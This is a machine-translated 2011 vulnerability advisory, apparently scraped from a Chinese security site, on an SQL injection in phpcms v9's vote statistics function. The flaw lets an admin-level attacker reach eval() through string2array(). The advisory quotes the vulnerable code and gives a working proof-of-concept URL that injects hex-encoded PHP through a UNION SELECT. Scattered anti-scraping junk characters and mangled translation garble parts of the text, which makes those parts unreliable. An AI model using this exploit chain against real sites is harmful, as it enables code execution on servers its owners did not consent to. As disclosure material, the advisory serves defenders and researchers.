phpcms v9 backend(sql inj)2(code exec)vulnerability-vulnerability warning-the black bar safety net

2011-09-08T00:00:00
ID MYHACK58:62201131802
Type myhack58
Reporter 佚名
Modified 2011-09-08T00:00:00

Description

Author: sdk original: Google looking to go.

phpcms v9 backend(sql inj)2(code exec)vulnerability - low-key development# `0 T6 X# F: V) j: e6 i by flyh4t - Low profile development 7 K) c' j. K( g/ \# i( r phpcms v9 string2array()function using the eval function,in more than one place may cause code execution vulnerability

function string2array($data) { if($data == ") return array(); eval("\$array = $data;"); return $array; } Copy the code For example, the voting results of the statistics(requires background privileges) /moudles/vote/vote.php / * The poll results statistics / public function statistics() { $subjectid = $_GET['subjectid']; $show_validator = $show_scroll = $show_header = true; //Get the poll information $sdb = pc_base::load_model('vote_data_model'); //load voting statistics of the data model $infos = $sdb->select("subjectid = $subjectid",'data'); //$subjectid is not filtered //Create a new array for storing the new combined data $total = 0; $vote_data =array(); $vote_data['total'] = 0 ;//all voting option the total number of $vote_data['votes'] = 0 ;//turnout //Loop each member's voting record foreach($infos as $subjectid_arr) {//sql injectionvulnerability control results extract($subjectid_arr); $arr = string2array($data);//into the eval function foreach($arr as $key => $values){ $vote_data[$key]+=1; } $total += array_sum($arr); $vote_data['votes']++ ; } $vote_data['total'] = $total ; //Remove vote option $options = $this->db2->get_options($subjectid); include $this->admin_tpl('vote_statistics'); } Copy the code poc code index. php? m=vote&c=vote&a=statistics&show_type=1&subjectid=0 union select 0x706870696E666F2829/&siteid=1&pc_hash=LFeCIl Copy the code pc_hash each different.